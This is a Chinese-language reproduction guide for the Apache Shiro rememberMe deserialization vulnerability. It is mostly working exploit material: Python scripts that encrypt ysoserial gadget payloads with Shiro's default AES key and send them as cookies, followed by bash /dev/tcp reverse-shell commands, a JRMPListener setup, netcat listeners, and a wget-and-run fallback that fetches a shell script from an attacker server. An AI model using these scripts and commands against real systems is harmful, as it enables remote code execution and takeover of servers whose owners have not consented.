Apache Shiro漏洞复现

利用burp dns进行检测，脚本如下：

import sys
import uuid
import base64
import subprocess
from Crypto.Cipher import AES
import requests

# copy to clipboard

def encode_rememberme(command):
    popen = subprocess.Popen(['java', '-jar', 'ysoserial.jar', 'URLDNS', command], stdout=subprocess.PIPE)
    BS = AES.block_size
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")
    iv = uuid.uuid4().bytes
    encryptor = AES.new(key, AES.MODE_CBC, iv)
    file_body = pad(popen.stdout.read())
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
    return base64_ciphertext


if __name__ == '__main__':

    payload = encode_rememberme('http://xxx.burpcollaborator.net')    
    print "rememberMe={0}".format(payload.decode())
    target = 'http://xxx.com'
    r = requests.get(target,cookies={'rememberMe': payload.decode()},timeout=10)
    print r.text

　　漏洞利用脚本如下：

import os
import re
import base64
import uuid
import subprocess
import requests
import sys
from Crypto.Cipher import AES



def poc(url,rce_command):
    if '://' not in url:
        target = 'https://%s' % url if ':443' in url else 'http://%s' % url
    else:
        target = url
    payload = generator(rce_command)
    #  
    try:
        
        #print "rememberMe={0}".format(payload.decode())
        r = requests.get(target,cookies={'rememberMe': payload.decode()},timeout=10)
        print r.text
    except Exception, e:
        pass
    # # return False

def generator(command):

    popen = subprocess.Popen(['java', '-jar', 'ysoserial.jar', 'JRMPClient', command], stdout=subprocess.PIPE)
    BS = AES.block_size
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    key = "kPH+bIxk5D2deZiIxcaaaA=="
    mode = AES.MODE_CBC
    iv = uuid.uuid4().bytes
    encryptor = AES.new(base64.b64decode(key), mode, iv)
    file_body = pad(popen.stdout.read())
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
    #print(base64_ciphertext)
    return base64_ciphertext

if __name__ == '__main__':
    url = 'http://x.x.x.x:8071'
    cmd = 'x.x.x.x:443'
    poc(url,cmd)

　　

        在你的vps上使用如下payload进行反弹即可

linux反弹命令
bash -i >& /dev/tcp/xxxxxx.x/53 0>&1

base64编码
bash -c {echo,xxxxxxx}|{base64,-d}|{bash,-i}
vps上执行,CommonsCollections也可以使用CommonsCollections2，CommonsCollections4
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 443 CommonsCollections1 'bash -c {echo,xxxxxxx}|{base64,-d}|{bash,-i}'

监听反弹端口
nc -lvp 53

 

　　有时候直接反弹是不成功的。可以先下载然后执行。

/bin/bash -i >& /dev/tcp/*.*.*.*/2019 0>&1
将反弹shell的命令写成txt然后放在web目录下

开启web
python -m SimpleHTTPServer 8080

执行下载命令
java -cp ysoserial-master-SNAPSHOT.jar ysoserial.exploit.JRMPListener 2020 CommonsCollections1 'wget http://*.*.*.*:8080/1.txt'

执行反弹命令
java -cp ysoserial-master-SNAPSHOT.jar ysoserial.exploit.JRMPListener 2020 CommonsCollections1 'sh 1.txt'

监听反弹端口
nc -lvv 2019